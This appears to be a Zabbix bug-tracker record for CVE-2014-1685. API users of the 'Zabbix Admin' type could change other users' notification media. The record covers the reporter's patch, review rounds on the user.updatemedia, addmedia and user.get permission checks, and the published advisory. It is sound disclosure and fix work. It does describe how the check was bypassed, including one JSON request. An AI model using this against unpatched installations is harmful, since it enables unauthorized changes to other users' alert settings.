ZABBIX BUGS AND ISSUES
  1. ZABBIX BUGS AND ISSUES
  2. ZBX-7693

User type "Zabbix Admin" users can modify the media for all Zabbix users - Security hole

    Details

      Description

      Based on the UI, I would assume (and hope) that only Zabbix Super Admins could modify the media for any user. In the UI, only Zabbix Super Admins can get to the Administration tab to make user changes. Using the API, I did a test today and found that a user of type "Zabbix Admin" user can modify the media for any users in the zabbix system! For history on why I found this, see ZBXNEXT-2122.

      CVE-2014-1685

        Activity

        Corey Shaw created issue -
        richlv made changes -
        Field Original Value New Value
        Labels security
        richlv made changes -
        Labels security security usermedia
        Priority Minor [ 4 ] Critical [ 2 ]
        Hide
        Corey Shaw added a comment -

        ZBX-7693-modify-own-profile.patch fixes the hole by doing two things:

        1. Only Zabbix Super Admins can modify the media for any user.

        2. All other types of users can only modify their own media.

        Show
        Corey Shaw added a comment - ZBX-7693 -modify-own-profile.patch fixes the hole by doing two things: 1. Only Zabbix Super Admins can modify the media for any user. 2. All other types of users can only modify their own media.
        Corey Shaw made changes -
        Attachment ZBX-7693-modify-own-profile.patch [ 26260 ]
        richlv made changes -
        Labels security usermedia patch security usermedia
        Eduards Samersovs (Inactive) made changes -
        Assignee Eduards Samersovs [ eduards ]
        Hide
        Eduards Samersovs (Inactive) added a comment - - edited

        Big thanks for Your patch!

        Fixed in development branch svn://svn.zabbix.com/branches/dev/ZBX-7693

        Show
        Eduards Samersovs (Inactive) added a comment - - edited Big thanks for Your patch! Fixed in development branch svn://svn.zabbix.com/branches/dev/ZBX-7693
        Eduards Samersovs (Inactive) made changes -
        Status Open [ 1 ] Resolved [ 5 ]
        Fix Version/s 2.2.2 [ 12012 ]
        Fix Version/s 2.3.0 (trunk) [ 12006 ]
        Resolution Fixed [ 1 ]
        Pavels Jelisejevs (Inactive) made changes -
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Hide
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (1) Zabbix admin users must be able to change media for themselves. You can use user.get with "editable" to check for both existence and permissions to the user.

        Eduards Samersovs RESOLVED r.41893

        Pavels Jelisejevs CLOSED.

        Show
        Pavels Jelisejevs (Inactive) added a comment - - edited (1) Zabbix admin users must be able to change media for themselves. You can use user.get with "editable" to check for both existence and permissions to the user. Eduards Samersovs RESOLVED r.41893 Pavels Jelisejevs CLOSED.
        Pavels Jelisejevs (Inactive) made changes -
        Resolution Fixed [ 1 ]
        Status Resolved [ 5 ] Reopened [ 4 ]
        Pavels Jelisejevs (Inactive) made changes -
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Hide
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (2) Minor typo correction in r41856.

        Eduards Samersovs CLOSED

        Show
        Pavels Jelisejevs (Inactive) added a comment - - edited (2) Minor typo correction in r41856. Eduards Samersovs CLOSED
        Eduards Samersovs (Inactive) made changes -
        Status Reopened [ 4 ] Resolved [ 5 ]
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Resolution Fixed [ 1 ]
        Hide
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (3) I'm still able to add new media to other users using user.updatemedia.

        Eduards Samersovs RESOLVED r.41905

        Pavels Jelisejevs The user.updatemedia method must perform all of the permission validation and field validation itself. It should not delegate it to addmedia and deletemedia.

        Eduards Samersovs RESOLVED r.41966

        Pavels Jelisejevs Please refactor the validation code the way we discussed.

        Eduards Samersovs RESOLVED r.42017

        Pavels Jelisejevs I've made changes in r42221, please review.

        Eduards Samersovs OK, Thanks, please review r.42225

        Pavels Jelisejevs CLOSED.

        Show
        Pavels Jelisejevs (Inactive) added a comment - - edited (3) I'm still able to add new media to other users using user.updatemedia. Eduards Samersovs RESOLVED r.41905 Pavels Jelisejevs The user.updatemedia method must perform all of the permission validation and field validation itself. It should not delegate it to addmedia and deletemedia. Eduards Samersovs RESOLVED r.41966 Pavels Jelisejevs Please refactor the validation code the way we discussed. Eduards Samersovs RESOLVED r.42017 Pavels Jelisejevs I've made changes in r42221, please review. Eduards Samersovs OK, Thanks, please review r.42225 Pavels Jelisejevs CLOSED.
        Hide
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (4) user.addmedia and user.deletemedia must be validated as well.

        Eduards Samersovs RESOLVED r.41905

        Pavels Jelisejevs

        Regarding user.addmedia:
        1. The CUser::validateAddMedia() must accept the same params as addMedia().
        2. The "foreach ($users as $user) {" loop is unnecessary in CUser::validateAddMedia().
        3. I suggest to change to error message to "You do not have permissions to create media for other users.". It's more correct.

        Regarding user.deletemedia:
        1. The error should be changed to the standard "No permissions to referred object or it does not exist!" message, since we're referencing media, not users in the request.

        Eduards Samersovs RESOLVED r.42017

        Pavels Jelisejevs I've made some changes to deletemedia in r42214, please review.

        Eduards Samersovs OK, please review r.42225

        Pavels Jelisejevs CLOSED.

        Show
        Pavels Jelisejevs (Inactive) added a comment - - edited (4) user.addmedia and user.deletemedia must be validated as well. Eduards Samersovs RESOLVED r.41905 Pavels Jelisejevs Regarding user.addmedia: 1. The CUser::validateAddMedia() must accept the same params as addMedia(). 2. The "foreach ($users as $user) {" loop is unnecessary in CUser::validateAddMedia(). 3. I suggest to change to error message to "You do not have permissions to create media for other users.". It's more correct. Regarding user.deletemedia: 1. The error should be changed to the standard "No permissions to referred object or it does not exist!" message, since we're referencing media, not users in the request. Eduards Samersovs RESOLVED r.42017 Pavels Jelisejevs I've made some changes to deletemedia in r42214, please review. Eduards Samersovs OK, please review r.42225 Pavels Jelisejevs CLOSED.
        Pavels Jelisejevs (Inactive) made changes -
        Resolution Fixed [ 1 ]
        Status Resolved [ 5 ] Reopened [ 4 ]
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Eduards Samersovs (Inactive) made changes -
        Status Reopened [ 4 ] Resolved [ 5 ]
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Resolution Fixed [ 1 ]
        Hide
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (5) There is a problem with the user.get method that needs to be fixed before we can resolve this issue.

        {
            "editable": true,
            "countOutput": true,
            "userids": [
                "1"
            ]
        }
        

        The request above will always return "1" even if user "1" is not writable for the current user. Due to this bug we can still update media for other users as long as we specify only one user.

        Eduards Samersovs RESOLVED r.41973,41974

        Pavels Jelisejevs CLOSED.

        Show
        Pavels Jelisejevs (Inactive) added a comment - - edited (5) There is a problem with the user.get method that needs to be fixed before we can resolve this issue. { "editable" : true , "countOutput" : true , "userids" : [ "1" ] } The request above will always return "1" even if user "1" is not writable for the current user. Due to this bug we can still update media for other users as long as we specify only one user. Eduards Samersovs RESOLVED r.41973,41974 Pavels Jelisejevs CLOSED.
        Pavels Jelisejevs (Inactive) made changes -
        Resolution Fixed [ 1 ]
        Status Resolved [ 5 ] Reopened [ 4 ]
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        richlv made changes -
        Fix Version/s 2.2.2rc1 [ 12011 ]
        Fix Version/s 2.2.2 [ 12012 ]
        richlv made changes -
        Description Based on the UI, I would assume (and hope) that only Zabbix Super Admins could modify the media for any user. In the UI, only Zabbix Super Admins can get to the Administration tab to make user changes. Using the API, I did a test today and found that a user of type "Zabbix Admin" user can modify the media for any users in the zabbix system! For history on why I found this, see ZBXNEXT-2122. Based on the UI, I would assume (and hope) that only Zabbix Super Admins could modify the media for any user. In the UI, only Zabbix Super Admins can get to the Administration tab to make user changes. Using the API, I did a test today and found that a user of type "Zabbix Admin" user can modify the media for any users in the zabbix system! For history on why I found this, see ZBXNEXT-2122.

        CVE-2014-1685
        Eduards Samersovs (Inactive) made changes -
        Status Reopened [ 4 ] Resolved [ 5 ]
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Resolution Fixed [ 1 ]
        Hide
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (6) Problems with usermedia.get:

        I'm logged in as an admin user. The following request should return all media for users in my user groups. Now it doesn't return anything.

        {
            "output": "extend"
        }
        

        Adding "editable" to the request must return only my media, but now it returns all of the media.

        Eduards Samersovs RESOLVED r.42017

        Pavels Jelisejevs CLOSED.

        Show
        Pavels Jelisejevs (Inactive) added a comment - - edited (6) Problems with usermedia.get: I'm logged in as an admin user. The following request should return all media for users in my user groups. Now it doesn't return anything. { "output" : "extend" } Adding "editable" to the request must return only my media, but now it returns all of the media. Eduards Samersovs RESOLVED r.42017 Pavels Jelisejevs CLOSED.
        Pavels Jelisejevs (Inactive) made changes -
        Resolution Fixed [ 1 ]
        Status Resolved [ 5 ] Reopened [ 4 ]
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Eduards Samersovs (Inactive) made changes -
        Status Reopened [ 4 ] Resolved [ 5 ]
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Resolution Fixed [ 1 ]
        Pavels Jelisejevs (Inactive) made changes -
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Eduards Samersovs (Inactive) made changes -
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Hide
        Pavels Jelisejevs (Inactive) added a comment -

        TESTED.

        Show
        Pavels Jelisejevs (Inactive) added a comment - TESTED.
        Pavels Jelisejevs (Inactive) made changes -
        Status Resolved [ 5 ] Tested [ 10002 ]
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Hide
        Eduards Samersovs (Inactive) added a comment -

        Fixed in versions 2.3.0 (trunk) r.42234, 2.2.2rc1 r.42233

        Show
        Eduards Samersovs (Inactive) added a comment - Fixed in versions 2.3.0 (trunk) r.42234, 2.2.2rc1 r.42233
        Eduards Samersovs (Inactive) made changes -
        Status Tested [ 10002 ] Closed [ 6 ]
        Assignee Eduards Samersovs [ eduards ]
        Hide
        richlv added a comment - - edited

        (7) this removed translatable string "Cannot insert user media." and added a translatable "DBerror". two problems with that :

        a) it was done during string freeze;
        b) even if the string change is valid, "DBerror" should not be translatable

        Pavels Jelisejevs Fixed directly in 2.2 r42325 and 2.3 r42326.

        Show
        richlv added a comment - - edited (7) this removed translatable string "Cannot insert user media." and added a translatable "DBerror". two problems with that : a) it was done during string freeze; b) even if the string change is valid, "DBerror" should not be translatable Pavels Jelisejevs Fixed directly in 2.2 r42325 and 2.3 r42326.
        richlv made changes -
        Resolution Fixed [ 1 ]
        Status Closed [ 6 ] Reopened [ 4 ]
        Hide
        richlv added a comment - - edited

        (8) this security problem has not been fixed for 1.8 and 2.0 - were they not vulnerable ?

        Pavels Jelisejevs RESOLVED

        • for 2.0 in svn://svn.zabbix.com/branches/dev/ZBX-7693
        • for 1.8 in svn://svn.zabbix.com/branches/dev/ZBX-7693-1.8

        Eduards Samersovs CLOSED

        Show
        richlv added a comment - - edited (8) this security problem has not been fixed for 1.8 and 2.0 - were they not vulnerable ? Pavels Jelisejevs RESOLVED for 2.0 in svn://svn.zabbix.com/branches/dev/ZBX-7693 for 1.8 in svn://svn.zabbix.com/branches/dev/ZBX-7693-1.8 Eduards Samersovs CLOSED
        Pavels Jelisejevs (Inactive) made changes -
        Assignee Pavels Jelisejevs [ jelisejev ]
        Alexander Vladishev made changes -
        Assignee Pavels Jelisejevs [ jelisejev ] Alexander Vladishev [ sasha ]
        Alexander Vladishev made changes -
        Assignee Alexander Vladishev [ sasha ] Pavels Jelisejevs [ jelisejev ]
        Pavels Jelisejevs (Inactive) made changes -
        Status Reopened [ 4 ] Resolved [ 5 ]
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Resolution Fixed [ 1 ]
        Eduards Samersovs (Inactive) made changes -
        Status Resolved [ 5 ] Tested [ 10002 ]
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Hide
        Pavels Jelisejevs (Inactive) added a comment -

        Fixed in 1.8.20rc2 r42354 and 2.0.11rc2 r42358.

        CLOSED.

        Show
        Pavels Jelisejevs (Inactive) added a comment - Fixed in 1.8.20rc2 r42354 and 2.0.11rc2 r42358. CLOSED.
        Pavels Jelisejevs (Inactive) made changes -
        Status Tested [ 10002 ] Closed [ 6 ]
        Fix Version/s 1.8.20rc2 [ 12105 ]
        Fix Version/s 2.0.11rc2 [ 12104 ]
        Hide
        richlv added a comment - - edited

        -------------------------
        Vulnerability description
        -------------------------

        Users of type 'admin' may modify media for other users even though they should be able to modify their own media only.

        Please use CVE-2014-1685 to refer to this vulnerability.

        -------
        Details
        -------

        Users of type 'admin' should be able to modify only their own media. Zabbix API allowed them to modify media for any user.

        This issue has been reported by Corey Shaw.

        -----------------
        Affected versions
        -----------------

        All of the Zabbix versions are vulnerable to this problem.

        --------------
        Fixed versions
        --------------

        These vulnerabilities have been fixed in the latest releases of Zabbix.

        The fix is available in the following Zabbix releases:
        2.2.2
        2.0.11
        1.8.20

        Show
        richlv added a comment - - edited ------------------------- Vulnerability description ------------------------- Users of type 'admin' may modify media for other users even though they should be able to modify their own media only. Please use CVE-2014-1685 to refer to this vulnerability. ------- Details ------- Users of type 'admin' should be able to modify only their own media. Zabbix API allowed them to modify media for any user. This issue has been reported by Corey Shaw. ----------------- Affected versions ----------------- All of the Zabbix versions are vulnerable to this problem. -------------- Fixed versions -------------- These vulnerabilities have been fixed in the latest releases of Zabbix. The fix is available in the following Zabbix releases: 2.2.2 2.0.11 1.8.20
        Oleksiy Zagorskyi made changes -
        Labels patch security usermedia patch permissions security usermedia
        Alexey Pustovalov made changes -
        Link This issue is duplicated by SPT-8 [ SPT-8 ]
        Alexei Vladishev made changes -
        Workflow Zabbix workflow [ 33642 ] Zabbix workflow - new [ 47946 ]
        Alexander Vladishev made changes -
        Workflow Zabbix workflow - new [ 47946 ] Copy of Zabbix workflow - new [ 68211 ]
        Alexander Vladishev made changes -
        Workflow Copy of Zabbix workflow - new [ 68211 ] Zabbix workflow - new [ 83433 ]
        Gatis Rumbens made changes -
        Issue Type Bug [ 1 ] Incident report [ 10110 ]
        Zabbix ID NA
        Assignee Pavels Jelisejevs [ jelisejev ]
        Transition Time In Source Status Execution Times Last Executer Last Execution Date
        Open Open Resolved Resolved
        1d 8h 3m 1 Eduards Samersovs (Inactive) 2014 Jan 24 09:52
        Resolved Resolved Reopened Reopened
        1d 5h 35m 4 Pavels Jelisejevs (Inactive) 2014 Jan 30 16:26
        Closed Closed Reopened Reopened
        1d 5h 26m 1 richlv 2014 Feb 05 22:07
        Reopened Reopened Resolved Resolved
        6d 10h 41m 5 Pavels Jelisejevs (Inactive) 2014 Feb 06 14:05
        Resolved Resolved Merging Merging
        4d 7h 15m 2 Eduards Samersovs (Inactive) 2014 Feb 06 15:04
        Merging Merging Closed Closed
        1h 18m 2 Pavels Jelisejevs (Inactive) 2014 Feb 06 16:10

          People

          • Assignee:
            Unassigned
            Reporter:
            Corey Shaw
          • Votes:
            0 Vote for this issue
            Watchers:
            0 Start watching this issue

            Dates

            • Created:
              Updated:
              Resolved: